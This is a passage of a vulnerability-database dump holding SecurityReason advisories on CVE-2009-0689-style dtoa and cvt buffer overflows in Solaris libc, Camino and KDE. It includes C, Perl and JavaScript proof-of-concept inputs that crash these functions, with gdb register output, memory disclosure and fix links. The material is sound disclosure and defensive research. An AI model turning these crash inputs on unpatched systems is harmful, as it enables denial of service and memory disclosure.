0x00000000 gs: 0x00000037\r\n cr2: 0x7e33d590\r\n\r\n- --- 3. 
SecurityReason Note ---\r\nOfficially SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - Mozilla Thunderbird\r\n- - Mozilla Sunbird\r\n- - Mozilla Camino\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n- - F-Lock\r\n\r\nThis list is not yet closed.\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://w
ww.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/", "edition": 1, "modified": "2009-12-15T00:00:00", "published": "2009-12-15T00:00:00", "id": "SECURITYVULNS:DOC:22933", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22933", "title": "Camino 1.6.10 Remote Array Overrun (Arbitrary code execution)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ Sun Solaris 10 libc/*convert (*cvt) buffer overflow ]\r\n\r\nAuthor: Maksymilian Arciemowicz\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 15.04.2010\r\n- - Pub.: 21.05.2010\r\n\r\nAffected Software:\r\n- - Sun Solaris 10 10/9\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/86\r\n\r\n\r\n- --- 0.Description ---\r\nSYNOPSIS\r\n #include <floatingpoint.h>\r\n\r\n char *econvert(double value, int ndigit, int *decpt, int\r\n *sign, char *buf);\r\n\r\n char *fconvert(double value, int ndigit, int *decpt, int\r\n *sign, char *buf);\r\n\r\n char *gconvert(double value, int ndigit, int trailing, char\r\n *buf);\r\n\r\n char *seconvert(single *value, int ndigit, int *decpt, int\r\n *sign, char *buf);\r\n\r\n char *sfconvert(single *value, int ndigit, int *decpt, int\r\n *sign, char *buf);\r\n\r\n char *sgconvert(single *value, int ndigit, int trailing,\r\n char *buf);\r\n\r\n char *qeconvert(quadruple *value, int ndigit, 
int *decpt,\r\n int *sign, char *buf);\r\n\r\n char *qfconvert(quadruple *value, int ndigit, int *decpt,\r\n int *sign, char *buf);\r\n\r\n char *qgconvert(quadruple *value, int ndigit, int trailing,\r\n char *buf);\r\n\r\n The econvert() function converts the value to a null-\r\n terminated string of ndigit ASCII digits in buf and returns\r\n a pointer to buf. buf should contain at least ndigit+1 characters.\r\n The position of the decimal point relative to the\r\n beginning of the string is stored indirectly through decpt.\r\n Thus buf == "314" and *decpt == 1 corresponds to the numerical\r\n value 3.14, while buf == "314" and *decpt == -1\r\n corresponds to the numerical value .0314. If the sign of the\r\n result is negative, the word pointed to by sign is nonzero;\r\n otherwise it is zero. The least significant digit is\r\n rounded.\r\n\r\nSYNOPSIS\r\n #include <stdlib.h>\r\n\r\n char *ecvt(double value, int ndigit, int *restrict decpt,\r\n int *restrict sign);\r\n\r\n char *fcvt(double value, int ndigit, int *restrict decpt,\r\n int *restrict sign);\r\n\r\n char *gcvt(double value, int ndigit, char *buf);\r\n\r\nDESCRIPTION\r\n The ecvt(), fcvt() and gcvt() functions convert floating-\r\n point numbers to null-terminated strings.\r\n\r\n\r\n- --- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow ---\r\nThe main problem exists in the Sun Solaris libc. 
OpenSolaris is not affected.\r\n\r\nPoC:\r\n- ---\r\n# cat jaja.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <floatingpoint.h> /* declares fconvert() on Solaris */\r\n\r\nint main (int argc, char *argv[]){\r\n\r\n char number[10000];\r\n\r\n int a,b;\r\n\r\n /* ndigit is taken from the command line without any limit */\r\n printf("%s", fconvert((double)0,atoi(argv[1]),&a,&b,number));\r\n return 0;\r\n}\r\n\r\n# /usr/local/bin/gcc -o jaja jaja.c\r\n# ./jaja 16\r\n0000000000000000#\r\n# ./jaja 512\r\n00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000#\r\n- ---\r\n\r\nFor 512 it works fine because we converted (double)0. When we use a non-zero\r\nvalue, it crashes.\r\n\r\nok. 
let's set a non-zero value in jaja2.c\r\n\r\nPoC:\r\n- ---\r\n# cat jaja2.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <floatingpoint.h> /* declares fconvert() on Solaris */\r\n\r\nint main (int argc, char *argv[]){\r\n\r\n char number[10000];\r\n\r\n int a,b;\r\n\r\n /* same as jaja.c, but converting a non-zero value */\r\n printf("%s", fconvert((double)1,atoi(argv[1]),&a,&b,number));\r\n return 0;\r\n}\r\n\r\n# /usr/local/bin/gcc -o jaja2 jaja2.c\r\n# ./jaja2 512\r\nSegmentation fault (core dumped)\r\n# /usr/local/bin/gdb -q jaja2\r\n(no debugging symbols found)\r\n(gdb) r 512\r\nStarting program: /jaja2 512\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeab05c in fconvert () from /lib/libc.so.1\r\n(gdb) i r\r\neax 0x8047240 134509120\r\necx 0x3250 12880\r\nedx 0x8048000 134512640\r\nebx 0xfef9e000 -17178624\r\nesp 0x8044b38 0x8044b38\r\nebp 0x8044d68 0x8044d68\r\nesi 0x200 512\r\nedi 0x0 0\r\neip 0xfeeab05c 0xfeeab05c <fconvert+163>\r\neflags 0x10206 [ PF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n(gdb) x/x $edx\r\n0x8048000: Cannot access memory at address 0x8048000\r\n(gdb)\r\n- ---\r\n\r\nWe can get the same result with perl(1).\r\n\r\nPoC perl:\r\n- ---\r\n#!/usr/local/bin/perl\r\nprintf "%.512f", 1;\r\n# perl pss.pl\r\nSegmentation Fault - core dumped\r\n# /usr/local/bin/gdb -q perl\r\n(no debugging symbols found)\r\n(gdb) r pss.pl\r\nStarting program: /usr/bin/perl pss.pl\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfed7b05c in fconvert () from /lib/libc.so.1\r\n- ---\r\n\r\nok.\r\n\r\nFunctions like *cvt(3) are also affected. 
Let's check ecvt(3).\r\n\r\nPoC:\r\n- ---\r\n# cat jaja3.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint main (int argc, char *argv[]){\r\n\r\n int a,b;\r\n\r\n /* ecvt() writes into a fixed-size static buffer of its own */\r\n printf("%s", ecvt((double)1,atoi(argv[1]),&a,&b));\r\n return 0;\r\n}\r\n\r\n# ./jaja3 3405\r\n%Y....[some_part_of_memory]\r\n#\r\n- ---\r\n\r\nIt looks like a memory disclosure.\r\n\r\nLet's try a bigger value.\r\n\r\nPoC:\r\n- ---\r\n# ./jaja3 3500\r\nSegmentation fault (core dumped)\r\n- ---\r\n\r\nNow it is time to debug it.\r\n\r\nPoC:\r\n- ---\r\n# /usr/local/bin/gdb -q jaja3\r\n(no debugging symbols found)\r\n(gdb)\r\n(gdb) r 4000\r\nStarting program: /jaja3 4000\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeaaf72 in econvert () from /lib/libc.so.1\r\n(gdb) i r\r\neax 0xf00 3840\r\necx 0xdac 3500\r\nedx 0xfef929ab -17225301\r\nebx 0xfef9e000 -17178624\r\nesp 0x8047230 0x8047230\r\nebp 0x8047460 0x8047460\r\nesi 0xfa0 4000\r\nedi 0x1 1\r\neip 0xfeeaaf72 0xfeeaaf72 <econvert+144>\r\neflags 0x10287 [ CF PF SF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n- ---\r\n\r\neip can differ; it is not always in econvert+144.\r\n\r\nPoC:\r\n- ---\r\n(gdb) r 3501111111\r\nThe program being debugged has been started already.\r\nStart it from the beginning? 
(y or n) y\r\nStarting program: /jaja3 3501111111\r\n[New LWP 1 ]\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeaaf89 in econvert () from /lib/libc.so.1\r\n(gdb) i r\r\neax 0xcfa7d347 -811084985\r\necx 0x0 0\r\nedx 0x1 1\r\nebx 0xfef9e000 -17178624\r\nesp 0x8047230 0x8047230\r\nebp 0x8047460 0x8047460\r\nesi 0xd0aeb747 -793856185\r\nedi 0x1 1\r\neip 0xfeeaaf89 0xfeeaaf89 <econvert+167>\r\neflags 0x10287 [ CF PF SF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n- ---\r\n\r\nand it does not always crash in econvert.\r\n\r\nWe can see very interesting behavior in the printf(1) program.\r\n\r\nPoC:\r\n- ---\r\n# /usr/local/bin/gdb -q printf\r\n(no debugging symbols found)\r\n(gdb) r %.011111f 0\r\nStarting program: /usr/bin/printf %.011111f 0\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeea48da in _malloc_unlocked () from /lib/libc.so.1\r\n(gdb) r %.0111111f 0\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\n\r\nStarting program: /usr/bin/printf %.0111111f 0\r\n[New LWP 1 ]\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfee852ab in memcpy () from /lib/libc.so.1\r\n\r\n(gdb) r %.0111111f 1\r\nThe program being debugged has been started already.\r\nStart it from the beginning? 
(y or n) y\r\n\r\nStarting program: /usr/bin/printf %.0111111f 1\r\n[New LWP 1 ]\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfee8b05c in fconvert () from /lib/libc.so.1\r\n(gdb) x/i $eip\r\n0xfee8b05c <fconvert+163>: mov %al,(%edx)\r\n- ---\r\n\r\nFor printf(1) we got eip in:\r\n- - fconvert+163 (the same as in jaja2 with 512)\r\n- - memcpy\r\n- - _malloc_unlocked\r\n- - others\r\n\r\nThis vulnerability is very similar to CVE-2009-0689, but we have not found any part of the gdtoa\r\nlicense in the Oracle license, and the behavior in the above examples differs from CVE-2009-0689.\r\n\r\nhttp://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/libc/gen/common/ecvt.c\r\n\r\n- ---\r\n 34 char *\r\n 35 ecvt(arg, ndigits, decpt, sign)\r\n 36 double arg;\r\n 37 int ndigits, *decpt, *sign;\r\n 38 {\r\n 39 if (efcvtbuffer == NULL)\r\n 40 efcvtbuffer = (char *)calloc(1,1024);\r\n 41 return econvert(arg, ndigits, decpt, sign, efcvtbuffer);\r\n 42 }\r\n 43 \r\n- ---\r\n\r\nefcvtbuffer = (char *)calloc(1,1024);\r\nand ndigits can be bigger than the efcvtbuffer size.\r\n\r\nNow we show econvert():\r\n\r\nhttp://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/libc/gen/common/econvert.c\r\n\r\n- ---\r\n 34 econvert(arg, ndigits, decpt, sign, buf)\r\n 35 double arg;\r\n 36 int ndigits, *decpt, *sign;\r\n 37 char *buf;\r\n 38 {\r\n 39 decimal_mode dm;\r\n 40 decimal_record dr;\r\n 41 fp_exception_field_type ef;\r\n 42 int i;\r\n 43 char *pc;\r\n 44 int nc;\r\n 45 \r\n 46 dm.rd = fp_direction; /* Rounding direction. */\r\n 47 dm.df = floating_form; /* E format. */\r\n 48 dm.ndigits = ndigits; /* Number of significant digits. 
*/\r\n 49 double_to_decimal(&arg, &dm, &dr, &ef);\r\n 50 *sign = dr.sign;\r\n 51 switch (dr.fpclass) {\r\n 52 case fp_normal:\r\n 53 case fp_subnormal:\r\n 54 *decpt = dr.exponent + ndigits;\r\n 55 for (i = 0; i < ndigits; i++)\r\n 56 buf[i] = dr.ds[i];\r\n 57 buf[ndigits] = 0;\r\n 58 break;\r\n- ---\r\n\r\nLines 55 and 56 show the buffer overflow: ndigits is never checked against the size of buf.\r\n\r\nWe do not know why, but the OpenSolaris project contains a security patch while\r\nSunOS remains vulnerable.\r\n\r\n\r\n- --- 2. Fix ---\r\nSun bug 5105920\r\n\r\nOpenSolaris has removed this issue without realizing the security nature of the bug.\r\n\r\n\r\n- --- 3. Greets ---\r\nsp3x Infospec pi3\r\n\r\n\r\n- --- 4. Contact ---\r\nAuthor: SecurityReason.com [ Maksymilian Arciemowicz ]\r\n\r\nEmail:\r\n- - cxib {a\./t] securityreason [d=t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.com/exploit_alert/ - Exploit Database\r\nhttp://securityreason.com/security_alert/ - Vulnerability Database", "edition": 1, "modified": "2010-05-27T00:00:00", "published": "2010-05-27T00:00:00", "id": "SECURITYVULNS:DOC:23936", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23936", "title": "Sun Solaris 10 libc/*convert (*cvt) buffer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:31:16", "description": "No description provided by source.", "published": "2009-11-19T00:00:00", "type": "seebug", "title": "KDE KDELibs 4.3.3 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2009-11-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18280", "id": "SSV:18280", 
"sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - KDELibs 4.3.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/74\r\n\r\n\r\n- --- 0.Description ---\r\nKDELibs is a collection of libraries built on top of Qt that provides\r\nframeworks and functionality for developers of KDE-compatible software.\r\nThe KDELibs libraries are licensed under LGPL.\r\n\r\n\r\n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exist in dtoa implementation. KDE has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist\r\nin dtoa.cpp file\r\n\r\nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup\r\n\r\nand it is the same like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and\r\nit is possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("9",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we use konqueror to see this PoC, konqueror will crash. 
For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to process 24845, thread 0x7e6e6800]\r\n0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n\r\n0x06db85c3 <diff+163>: mov %esi,(%ecx)\r\n\r\n#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0\r\n#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0\r\n#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0\r\n#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0\r\n#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0\r\n#6 0x0908337f in KJS::InterpreterImp::evaluate ()\r\n\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x220ff000 571469824\r\nedx 0x0 0\r\nebx 0x220fbb00 571456256\r\nesp 0xcfbc04e0 0xcfbc04e0\r\nebp 0xcfbc0518 0xcfbc0518\r\nesi 0xc71c71c7 -954437177\r\nedi 0x0 0\r\neip 0x21415c3 0x21415c3\r\n\r\nesi=0x71c71c7\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficially SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that it would inform all\r\nvendors about this issue; however, they did not do it. Even greater\r\nconfusion was caused by the new CVE number "CVE-2009-1563". Secunia reported\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products (like KDE and Chrome)\r\nand that it is based on "CVE-2009-0689". 
After some time Mozilla Foundation\r\nSecurity Advisory\r\n("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)\r\nwas updated with note :\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/st
rtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. 
